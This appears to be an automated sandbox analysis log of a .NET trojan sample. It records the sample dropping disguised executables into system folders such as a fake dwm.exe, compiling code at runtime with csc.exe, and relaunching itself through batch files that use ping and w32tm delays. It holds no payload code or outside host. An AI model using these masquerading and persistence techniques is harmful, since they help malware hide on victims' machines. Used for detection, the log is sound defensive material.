Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED1314	55_2_00007FF887ED1314
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED12D0	55_2_00007FF887ED12D0
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED12AB	55_2_00007FF887ED12AB
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887ED1A9E	55_2_00007FF887ED1A9E
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887EF10E5	55_2_00007FF887EF10E5
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887EFCC88	55_2_00007FF887EFCC88
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887EC0D48	55_2_00007FF887EC0D48
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Code function: 55_2_00007FF887EC0E43	55_2_00007FF887EC0E43

Source: LzBDVIdW.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: xQYgnzsS.log.13.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BazpdGXT.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LfwFFKlf.log.26.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZmWTGheo.log.31.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LwOexCEJ.log.36.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NpAnHTXs.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UOGmotWX.log.48.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZdtVejrZ.log.58.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: bridgenet.exe.bin.exe, 00000000.00000000.1339627587.0000000000C8E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs bridgenet.exe.bin.exe
Source: bridgenet.exe.bin.exe, 00000000.00000002.1397873178.000000001BA48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs bridgenet.exe.bin.exe
Source: bridgenet.exe.bin.exe, 00000031.00000002.2031706593.000000000279F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs bridgenet.exe.bin.exe
Source: bridgenet.exe.bin.exe, 00000039.00000002.2134279684.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs bridgenet.exe.bin.exe
Source: bridgenet.exe.bin.exe, 00000039.00000002.2134279684.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs bridgenet.exe.bin.exe
Source: bridgenet.exe.bin.exe, 00000039.00000002.2134279684.00000000031EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs bridgenet.exe.bin.exe
Source: bridgenet.exe.bin.exe, 00000039.00000002.2134279684.000000000320C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs bridgenet.exe.bin.exe
Source: bridgenet.exe.bin.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs bridgenet.exe.bin.exe

Source: bridgenet.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: bridgenet.exe.bin.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe1.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe2.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dwm.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@107/67@2/1

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File created: C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File created: C:\Users\user\Desktop\LzBDVIdW.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1688:120:WilError_03
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-8LvN0cHd0DMbHKTinv7o
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:688:120:WilError_03

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\xb2ojpgu

Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\62xZ8bmi7l.bat"

Source: bridgenet.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: bridgenet.exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bridgenet.exe.bin.exe	ReversingLabs: Detection: 73%
Source: bridgenet.exe.bin.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File read: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB99.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF6FBA02FA6D54D1FBEF275314C5F713F.TMP"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE49.tmp" "c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\62xZ8bmi7l.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: unknown	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: unknown	Process created: C:\Program Files\Internet Explorer\images\dwm.exe "C:\Program Files\Internet Explorer\images\dwm.exe"
Source: unknown	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Program Files\Internet Explorer\images\dwm.exe "C:\Program Files\Internet Explorer\images\dwm.exe"
Source: C:\Windows\System32\chcp.com	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Internet Explorer\images\dwm.exe "C:\Program Files\Internet Explorer\images\dwm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: unknown	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Program Files\Internet Explorer\images\dwm.exe "C:\Program Files\Internet Explorer\images\dwm.exe"
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\PING.EXE	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE49.tmp" "c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB99.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF6FBA02FA6D54D1FBEF275314C5F713F.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE49.tmp" "c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Internet Explorer\images\dwm.exe "C:\Program Files\Internet Explorer\images\dwm.exe"
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Section loaded: urlmon.dll	Jump to behavior
